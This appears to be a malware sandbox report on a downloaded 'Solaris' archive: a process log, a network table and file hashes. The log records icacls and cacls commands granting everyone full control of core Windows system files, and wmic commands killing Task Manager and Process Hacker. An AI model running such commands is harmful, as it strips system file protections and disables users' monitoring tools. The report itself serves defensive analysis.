C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\winload.exe" /grant "everyone":F
C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F
C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F
C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\logonui.exe" /grant "everyone":F
C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\resmon.exe" /grant "everyone":F
C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F
C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F
C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\tskill.exe" /grant "everyone":F
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Process Hacker 2" /q /c /t /grant "everyone":F
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\drivers" /q /c /t /grant "everyone":F
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='taskmgr.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='perfmon.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='logonui.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='ProcessHacker.exe' delete /nointeractive
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\hal.dll" /grant "everyone":F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\logonui.exe" /grant "everyone":F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\resmon.exe" /grant "everyone":F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\tskill.exe" /grant "everyone":F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\cacls.exe
cacls "C:\Program Files\Process Hacker 2" /grant "everyone":F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\cacls.exe
cacls "C:\Windows\System32\drivers" /grant "everyone":F
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | archive.org | udp |
| US | 207.241.224.2:443 | archive.org | tcp |
| US | 207.241.224.2:443 | archive.org | tcp |
| US | 207.241.239.241:443 | polyfill.archive.org | tcp |
| US | 207.241.225.195:443 | analytics.archive.org | tcp |
| US | 207.241.225.195:443 | analytics.archive.org | tcp |
| US | 207.241.225.195:443 | analytics.archive.org | tcp |
| DE | 142.250.185.74:443 | content-autofill.googleapis.com | tcp |
| DE | 142.250.185.74:443 | content-autofill.googleapis.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 207.241.232.192:443 | ia803402.us.archive.org | tcp |
| N/A | 127.0.0.1:49850 | tcp | |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | udp |
| US | 34.160.144.191:443 | prod.content-signature-chains.prod.webservices.mozgcp.net | tcp |
| US | 44.232.194.163:443 | shavar.services.mozilla.com | tcp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 34.120.5.221:443 | prod.pocket.prod.cloudops.mozgcp.net | tcp |
| N/A | 127.0.0.1:49858 | tcp | |
| DE | 142.250.185.68:443 | www.google.com | udp |
| DE | 142.250.185.68:443 | www.google.com | tcp |
| DE | 142.250.186.110:443 | play.google.com | udp |
| DE | 142.250.186.110:443 | play.google.com | tcp |
| DE | 142.250.185.142:443 | consent.google.com | tcp |
| DE | 142.250.185.74:443 | content-autofill.googleapis.com | udp |
| DE | 216.58.206.46:443 | encrypted-tbn0.gstatic.com | tcp |
| DE | 216.58.206.46:443 | encrypted-tbn0.gstatic.com | tcp |
| DE | 216.58.206.46:443 | encrypted-tbn0.gstatic.com | tcp |
| DE | 216.58.206.46:443 | encrypted-tbn0.gstatic.com | tcp |
| DE | 216.58.206.46:443 | encrypted-tbn0.gstatic.com | tcp |
| DE | 216.58.206.46:443 | encrypted-tbn0.gstatic.com | tcp |
| DE | 142.250.184.238:443 | encrypted-vtbn0.gstatic.com | tcp |
| DE | 216.58.206.46:443 | encrypted-tbn0.gstatic.com | udp |
| DE | 142.250.184.238:443 | encrypted-vtbn0.gstatic.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| N/A | 127.0.0.1:50269 | tcp | |
| US | 34.160.144.191:443 | prod.content-signature-chains.prod.webservices.mozgcp.net | tcp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| N/A | 127.0.0.1:50284 | tcp | |
| NL | 52.111.243.29:443 | tcp |
Files
\??\pipe\crashpad_3620_KKAKVZIJJDYYDSCC
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | b5973cf23670496f475509637ab0d5ba |
| SHA1 | b3e90958896f8745e58a4ec9f0f954273d7f62b4 |
| SHA256 | 870be1518171a8bfe0d68d9e0050780a03f99b3e70a37f790cf6cad44e6b78aa |
| SHA512 | c85a0fe31bab5ac73c03b8fcaecc1cdf57799624b476909461ae9b34f9704d50cd1d66b655e2e47542cdc110355467c844dddbe66b72dfdebd3c1443891a5716 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 31fbd498540ba9acfbc76e2101f18517 |
| SHA1 | 2457bf41c1094230fa94d35f2eaf4e80c9b6bacb |
| SHA256 | 06eacefa9cc4fb6cb965bb7ba8aa648d70dc3af65c6eb1365e217d043920ffe6 |
| SHA512 | 53be0f05e485f7e44e1e9e66fe0101ae4f0d775bc48a6ed2e91787d7422e1acf5d03e98b02f6aa4a074d5273696e5d99e77a046e0a4243ad6d61672842c6e289 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 4b03be1c6b1021a5d7883a3347648f76 |
| SHA1 | a2f73348bf222bfcad69d58f1ee498c3e2b3cd0b |
| SHA256 | ac0113cbe704ff36c0750d0f5b2930ed49905b3a84c3c1f9ed0f15e7992dd58a |
| SHA512 | fd9928c8112f21fc3cfd61b8a2a0b2aa233bf466620fb2655528d05874688868a4b8177bd88834a2104ad723575a02b1c0daaef65851eb4cb38d760b56002e38 |
C:\Users\Admin\Downloads\solaris.7z_archive.torrent:Zone.Identifier
| MD5 | 1498c919d81bfbd0f0e6df5a1d728261 |
| SHA1 | 4584fd2778bb5439f96987e07347985a7a1921f0 |
| SHA256 | 1f4684198a61f828733db318c76d1c1b2411fd11319c92da95abc6fbf3f6a6d3 |
| SHA512 | 4f93c02de068b8c7069699dc5f15bcdcb0e1f6830c7e58859fc7551e0c6fd4abf3a6a41fd1341ffcf13189b0eb8c611395fb88cae801b908463af7200207a8bd |
C:\Users\Admin\Downloads\solaris.7z_archive.torrent
| MD5 | 223c0d2a8f6e6bce03d09d4cdcccabd4 |
| SHA1 | 05770b08866cfe9686492b4bba2ac9e171c75dec |
| SHA256 | caecbdee4748021de7d1a86b3e0a2128bacd81db871ae26b37257d78a4603bac |
| SHA512 | a0e435287e7ea4cb1876daa64886e917433cfa9fb6f6996d3e552c2bb8306101855bdb69d04fd8056c2ca0049640938a715e92bbfb211d49cc1a5281ebc01698 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 859bcea545ac4f263d1e87d0c1679879 |
| SHA1 | 3f170eb3b8eb28428f951a5bdf9e15e70903cbc6 |
| SHA256 | 930e197dbeb2da0aaaf5a3ca3e3d86a9097976817b874917e420442a34ce00f9 |
| SHA512 | cf6773d03d9ebc192f3982c8e6f92bb70df2900ee9d023de4721d9bee3a09559a2c9063ea4ef842111bfcd1b442f97e9cfbac9096cf6a4555ea5db6f29506ba3 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\fy0o2joj.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | 91528fa1ec11454107035a82110b28de |
| SHA1 | c3539a8a494495e8c50f04b37501f9b7a5c88db5 |
| SHA256 | 168b8d337056ef4d9804535e972b93592bfc9d0052e9ab3cfd7906f0ee181fd8 |
| SHA512 | b9aa1a34259fbae6031d4e0746825d032517f38850a5b2b3bab4522295c6ada1ab35bfb24a670936d08079fc98dda1ae2d05e97d5eb1dca05cc766110029638c |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\fy0o2joj.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | 0aad52a70eb05a8303811e2fc678f196 |
| SHA1 | 56f88be91d4e6155d69ff8956ef4a93fe6d4cccd |
| SHA256 | e6ad163271bb13294afdb12dd4926b84d0269f5ac9e2c91815f88c11614da952 |
| SHA512 | d0068a3116ef27ce05033115864c264271091ef80a316e1ef9405857fa7caa640e7247626b21f04a3fb20f4e87db4589ee2eb614f997dc44124fc9f34a5baf7e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | e17eb91fcf77031e34065878245a8887 |
| SHA1 | 8ffeab763b7cc9bbedd98e523d4623de1962a01a |
| SHA256 | 5aa6bccf9181e076ea18741e5af4068e5eee04ab695f5bd572e09c1aad0c403d |
| SHA512 | 04a7fbfde41e3d6b67b40b68ef892a2e0debcf89c53a491effc31820f2623896f04a39ae42e4901ae8cc0b30f6aff92ab02f6de2ce7aa4d1cb74a2315a6bd7c1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 251c659ed650aa89cf2cb97f26d275f8 |
| SHA1 | c9683daff9e6fa5fff5d79dc970321ed5478633a |
| SHA256 | ba16d01023cf8e607a236d3804e62a8f2659205fea1c5b308c1658ecc12871f3 |
| SHA512 | 9b482557597c8aaface902a2d84f53e5cfce4945641830c20ca30b60aa85b62a3075b95e1e62c85d24bd4e42aec91bca6fee462119d52cc6fdd88a0ea7ddae52 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | e3b334fa9c34f462b450d254bbcfeebd |
| SHA1 | 7ff02a128dff1e43495a441a6a984ac158cd6756 |
| SHA256 | e489690a0117fdc0dbfceb65c9b809099b54c8c12ac63e3ba0490c7bef944d33 |
| SHA512 | b721d41b5b18c51220063619eba4a51543a6fd00d616d331df5fb3156f908a6af6e91ef50866a23a43abd35eb5160367d39895af4c747e5aa1c982170dcd4ae9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe57ceaa.TMP
| MD5 | 74a42a47bb74350081270394773d6272 |
| SHA1 | 42353fae04b4ab263d678a8e0233d67080ac311d |
| SHA256 | 24f25dc4e47b72435f650eb2d67d5db044c34b001391aa5692e3cdf46c2f5ca2 |
| SHA512 | 4b30ff99cc5408b1024861a37c5e02b865a7b93d8e9967724480c50ba6415f8cf6b8e9d95d649a0a501fc1d891f03551bb7031db7bc676d8a82a6b861f188bcb |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\prefs-1.js
| MD5 | 46fcbbbc570ad03ca8afb6e40cd63479 |
| SHA1 | 8268bc4b7ca0287f7886e20835424ac422089dc1 |
| SHA256 | 05707055ebcc9dafb0f10231ad0a34762bfa943a7543422d61fe92572818b3af |
| SHA512 | bfed94ea242e09511c98f19612276a97f8ad7024cf0aa7df4b1ec3e0a5d07bc6a33f6c6cc6b39b9c279581ce283d8ab01e6000b2e551e983b395089b3f2c8bdc |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\sessionstore.jsonlz4
| MD5 | 8506fa3245624827d6c806f3c5e98ee1 |
| SHA1 | 5e9a5d0e891a0e4116ea1b0714d5ee6caffe066c |
| SHA256 | e50b8e7b0907bda7dd83e0c0e709bd3e014bf4c18692ba04824d8cbe9ccbfe34 |
| SHA512 | 13204f86cb0f26c75e8070ee0ce251e3c276a463356c2392441902cee4f6aaf986fd65df85d3201bd5ec00aaed75680e7f66e40d619f15b06c52889f6975de77 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | ad8e8b227799980f57f0667fcf5bab81 |
| SHA1 | 7ff957a345df096cda6591e111119c59ced82c23 |
| SHA256 | c250a3f8ba8bf7d377a7925a4b3dc20767f45beef718215f991fa183839d8eb1 |
| SHA512 | 52eecb17dacd4ad01f3b93cf71c5e619ff1ad406a37cd2ac0b9a215acf189ef3f0a8dbde8e03df5b58d1c2b1847ea70456b5679fe6a5042a3ae65fcbf21f8fdc |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 1f6bf642b7fcc1b0fdd2cfb465b03086 |
| SHA1 | 93974fcc5b28980c8b1d6e678b9f95c6bb2a15b4 |
| SHA256 | 800eee39d660f4fd77ef79c92de5ef3fad9893db1edc405bbb764181854b3685 |
| SHA512 | 3ac171620e381bafa200d8f49edbb332beaa2c14ab4e8df77a4c1a43091003f6ffe43c99d2f6117c82b14a1d23691956cc7d1c247626a5b3639787aff0449127 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 343fbadac7189b11de807b475f71b493 |
| SHA1 | d6a363417690a32e85983cf668500a1d88c49338 |
| SHA256 | f6a203d3d5cb9607da4f55acd48ed1f64aea9154f3fb796dce1b79228bf22c14 |
| SHA512 | 367a3b8a2a7a2767589a567ebed684d9025cb827d289e7f3a803231c700a5ceac3aea82b324090fd29261277914662f891553e72aab1542923efac7fc5a20aac |
C:\Users\Admin\Downloads\Solaris 2.0.z01:Zone.Identifier
| MD5 | fbccf14d504b7b2dbcb5a5bda75bd93b |
| SHA1 | d59fc84cdd5217c6cf74785703655f78da6b582b |
| SHA256 | eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913 |
| SHA512 | aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | e52ef64c9bf26ec04aa57ec7f5f96ba4 |
| SHA1 | 091fc15d55990c5af22c4d250f90951a3e9c14a5 |
| SHA256 | 58840f2ab40e641fffe9385e32827a436527025901f17761290479810ec843a3 |
| SHA512 | a8ab5aac1583e5d6e9bc78121ceefddbb630f9a8ac5e6e0b5205669819e47b3b5f27d0ae52c87ae6965a1ca07b0a490b2a73af7c6d5edd56ab87341de4347a4d |
C:\Users\Admin\Downloads\Solaris 2.0.z01
| MD5 | 785e18d17f4e2134d93c51fe3d5ee6b1 |
| SHA1 | aa00b501547ce619b158d7ea6bdad104b3db00a4 |
| SHA256 | 9579c6d8e98d60688af84034100c1fb1e242f5c1b7a3ab44544200d600b85154 |
| SHA512 | 9c4f1b0d3f654fe72c461b0eb248866882ec45c1bcdb2cdd9851a1996246e528d475a2b9730cc893d2ccb2b1b1961864225e5dc4e6db20cbd828547d3a178eae |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 34c341a2ba6a3a395de5ee73c3d082f5 |
| SHA1 | 344342b891cdc17bee8364eb87a5b6abc478a14f |
| SHA256 | c7577931bcbd776bcdc5ffe13ba1ec0316355d3d65a018b96ee7415a1c965607 |
| SHA512 | b654d383197538a0a7691f74c0db348128d6d3866e36af9e2d036cb40cf3427b29ab02430658d8e521e2e14d4f4a1051e02dd03aac13d4b35ea789c8cce97966 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | f49a849e47c7301fcc0a3461a8a24b70 |
| SHA1 | 5279a4eb971a143cb62fbef43a2da7b331b65f4b |
| SHA256 | e1b910e69518f2d490574538772acb36e5eb1895907a2694b8511a53cb271094 |
| SHA512 | 5e8ac2fee0006182f2a6bda9229d2dabcbff08b2d17841a99230375d5a478e142ddee849ddefbe87a8418eac14559fddadad0bd834dc8bb475b578e2eac17b53 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\prefs.js
| MD5 | f5c62341687bad4df17be716c0e26c3e |
| SHA1 | 6c0778cd7cc7db7071209f461cfb94a1bbaffc31 |
| SHA256 | 1bd4c3829be89dc8e44951e453fd2ac3f9f4d649efee9db604e6579f414a05f0 |
| SHA512 | 991c7d65c5cf2a20773f6db0a2c44abbf12c979465975a1e0d26f2d5e4fc5e661ef77f5b4e80091696849c3f297622e9437032cf4927fabe2d8b04f6a8cda40d |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\fy0o2joj.default-release\startupCache\scriptCache-child.bin
| MD5 | c2788868ab1884f807fd6552046655a3 |
| SHA1 | 371cdf10a5e5254acfbe16320226e993070cc8d5 |
| SHA256 | c2bee14c5a419a7e1bda792757228fd9ff729fa13e3fe1c4564ad1aabd125583 |
| SHA512 | a9bf6207074d2fe317feef3fa74fe3be36293e7a6ad312aa2f01f9b6418413a9a7abfeb8ce015c6d993da60568aa6f1b6973020b418aa1af3389293ef724d0a5 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\fy0o2joj.default-release\startupCache\urlCache.bin
| MD5 | d4e2462d3472a2ae88a21ee2f1096853 |
| SHA1 | 90857f85b444d78de5800deff8cf1738b7e8d458 |
| SHA256 | 60e48664efeb914d93bf328f8edb2d721aa56f24af450ef38c89a5828c1b655e |
| SHA512 | 58edcdd38af446f79e22d085fb4676b956575be922f572368b135d1547b43670506db2d7dda0e5530df42d9d645ce1b438a4a252c585a958749ae076ea86df4b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\addonStartup.json.lz4
| MD5 | 7bb0d91d09cc64e6f66e96e5ca062f23 |
| SHA1 | 1bc68ed89c69468c57702cfdefc52602e05c92b0 |
| SHA256 | 0f9f2f2b00ea9d94d4c52c3e63aeb4c13714157519c51269ad46ba3e3abc0d11 |
| SHA512 | 8dcad9f2762b3a394611850897548a59fffcfebf0399daa6cbce5fcc25db303c77bb698fee030092e4c8d0b469ecbfcd9008e5ece6f9ba0c0377a0237817754c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\xulstore.json
| MD5 | 8d689c06cb844185099c0398a280537e |
| SHA1 | 57073c7526ec37e94bb9db44fedc6d50276f7a6b |
| SHA256 | 96729e9b38f216605ff10715f96f364be32f02e2de23ede7e74b78244605124d |
| SHA512 | 3c7df326c695143915df1068cb2c0f58e93e4881b2c4d94b33948b80e954fbd4cf944ae53b4d15002b79fcdb8e88f8e9cf4c89ca50f56b7cfd8a13ea7dd6fff8 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\fy0o2joj.default-release\startupCache\scriptCache.bin
| MD5 | 2048f5e62e95dc4b7c6a44821a0a970b |
| SHA1 | a6f2b6309835633a3762bb828cedade1178547e9 |
| SHA256 | c073463b06d2bb6f8e45351ac90e111776de1c3ef75aaf0e51d4719fd75cd99c |
| SHA512 | e7912d394f0d376e3d9e611328014dbf278aff9244fa10dce4354a112e99fac7491c3ff67baf49b307facb8c28ae2390d1dfaf57ae2670e9d3fecd9a62f320c9 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\sessionCheckpoints.json
| MD5 | 6b77a9f779399e95d1cee931a2c8f8ff |
| SHA1 | 826efd4feb0d50fcce5696111af7c811b81adcd9 |
| SHA256 | 3a0285c8233ef0324b269f7291094e19fd9b77259f9419861ad796f7e9c979f3 |
| SHA512 | ef537c75fab8e86483ac03cc0d2feaf41575e35f54b95669a26bf6dfbf58021dc9a5bbe54d9537b55da3fbb0e0262adf6c5efd4394faaec81a31604533afec4f |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\sessionCheckpoints.json.tmp
| MD5 | ea8b62857dfdbd3d0be7d7e4a954ec9a |
| SHA1 | b43bc4b3ea206a02ef8f63d5bfad0c96bf2a3b2a |
| SHA256 | 792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da |
| SHA512 | 076ee83534f42563046d25086166f82e1a3ec61840c113aec67abe2d8195daa247d827d0c54e7e8f8a1bbf2d082a3763577587e84342ec160ff97905243e6d19 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | 5bc3c87d7d2cda86c6575437e6bd9df4 |
| SHA1 | 26537acdf6a933c685c5e8e0bc63c19bfcf2feee |
| SHA256 | 41fc26ef67f4447499ca0adcd241e64cd78b4e538c13884ac433a02417838bc2 |
| SHA512 | 44f612b837955186ebcb864194b2a1821c391f2685343edd710227cff6babdbfa859b49bbb97be023233f49ae93e75bf416b43d183127430e7203e34cc86c210 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\SiteSecurityServiceState.txt
| MD5 | 445080329d8298c8ffc48a0cd5303384 |
| SHA1 | 46f0807f2a63f4e6084b591adc63bdd8386818b6 |
| SHA256 | fda813bca9b1baae5fe345c68aee2090fd8ef5025c83eda1ef7874efb3910814 |
| SHA512 | 681e03852dc617069f19ab7ad01c330604a30602b0cbb12a30feb597564c8697c77dfaa3cc8e30504a44b157f592e3eeb80c49a6a306f25762e6a4280d249541 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\sessionCheckpoints.json.tmp
| MD5 | c4ab2ee59ca41b6d6a6ea911f35bdc00 |
| SHA1 | 5942cd6505fc8a9daba403b082067e1cdefdfbc4 |
| SHA256 | 00ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2 |
| SHA512 | 71ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
| MD5 | 52d130ace9ef849f4ec6b9a6c5e73048 |
| SHA1 | a9e66cba8fb47d60784fec22124a0e63d6cdd2e0 |
| SHA256 | 884f6358b6a7917aabaf4f00751a31bccdb8fb1f5092f457cdc83b4144d7f782 |
| SHA512 | 9c7cab2e6dfda0a161d2556d34dc4748de86042b2d86fd057e5af2e7745a739fc1699d08732b80f73daad6893ef32f28ef9d5814af7d7127d50b6ad92db14c60 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\protections.sqlite
| MD5 | 49397db0486dc59d607907a086f40c9b |
| SHA1 | 08742ce9db9569062def08e99eea8470702feb7d |
| SHA256 | 890033ea279f13478e655150a823a5f84176d2f8f2ec3724dc61dfec775707c4 |
| SHA512 | fc8dad1ae2215cd96c41bb3e683670bb9138467677da46c19d1e58972775842a995b70123c22ea1efb659d043f5116d0c9dca422035a6646b35f81033c9f5f53 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\fy0o2joj.default-release\cache2\entries\254256B27E0C48CF9B80B695F0B3B8CA84610495
| MD5 | 5511aad1b3e547e040f792882e15567a |
| SHA1 | c4321f1920b6e820e6eb74ef08d3f1a5f60fa532 |
| SHA256 | 9fc645c1136931bd9a705b69ce6195dd2357ca155da33ff6b0ca40f0374ae91a |
| SHA512 | a5c65bfc47951a15c65ff294e6337b85104322633bf366fe8698fd141d64328ba761e8c793642f215cbce0f6a75bed4df09d31d092901acd8c2fc7a6e3992a6d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\datareporting\glean\db\data.safe.bin
| MD5 | 7d3d11283370585b060d50a12715851a |
| SHA1 | 3a05d9b7daa2d377d95e7a5f3e8e7a8f705938e3 |
| SHA256 | 86bff840e1bec67b7c91f97f4d37e3a638c5fdc7b56aae210b01745f292347b9 |
| SHA512 | a185a956e7105ad5a903d5d0e780df9421cf7b84ef1f83f7e9f3ab81bf683b440f23e55df4bbd52d60e89af467b5fc949bf1faa7810c523b98c7c2361fde010e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\places.sqlite
| MD5 | cd573071e80ebecb742101a12038b480 |
| SHA1 | e0cd9daffa5ebdfb0f8f529ce891332bc40b797a |
| SHA256 | 3f7cf92e90736f7193b2e73fc3049a0fd3c3eb26f69de3e7770a572692cdb497 |
| SHA512 | 6b6b6fb2fe0ffd69286d38672e0c09e1e9de89d7efa9cf97c8f610429bd971ca9e4ae5891d10f84700dfd699fea1c2656798674af45e2381e4083e2f72a6ff77 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\fy0o2joj.default-release\cache2\entries\383A97A57B113BD106DE6984E6DBA5F537327263
| MD5 | bb09cc049f621be6676bc5006b79aa14 |
| SHA1 | a09c6414f59c09ad12e7ed310b1a7dfea0c79acb |
| SHA256 | d87ef2bec5bbd65d182687441db48b75abf466b04e80b69972b889f9b36611e7 |
| SHA512 | fad39f214d007388b0bc48ea21147dab4d52f2d5e8d749937551f1c830add56e7a6f57574ec55a68a3a7b39c07e802ecb71be34afaabb6c79286199bf9db0dbd |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\fy0o2joj.default-release\cache2\entries\6D89348819C8881868053197CA0754F36784BF5F
| MD5 | 329e73a3eeef359316d5d033a86e5d54 |
| SHA1 | d755fabea822ff492506f4e11a9eaf56ad5fe2ce |
| SHA256 | c46ade5120f47938d01109834147457bf2322c62462bea00eb16d7f1a9cd7705 |
| SHA512 | 4d3ce10b76808319ef18b217d35cab9585402775c95cf6c6d337e7354689a703011beb04bfebe9e0ce3b490909bd0d0607aaa78ebed8d2203330e5ea6f1a7097 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\AlternateServices.txt
| MD5 | eeb13776455a5054c639980c84af83ac |
| SHA1 | b51dac9aac72694c9be2e27d1b48f393211e1c0e |
| SHA256 | 44907302b74a1295b1f6b2e27807897639716c68743b475c4725c7071e71945a |
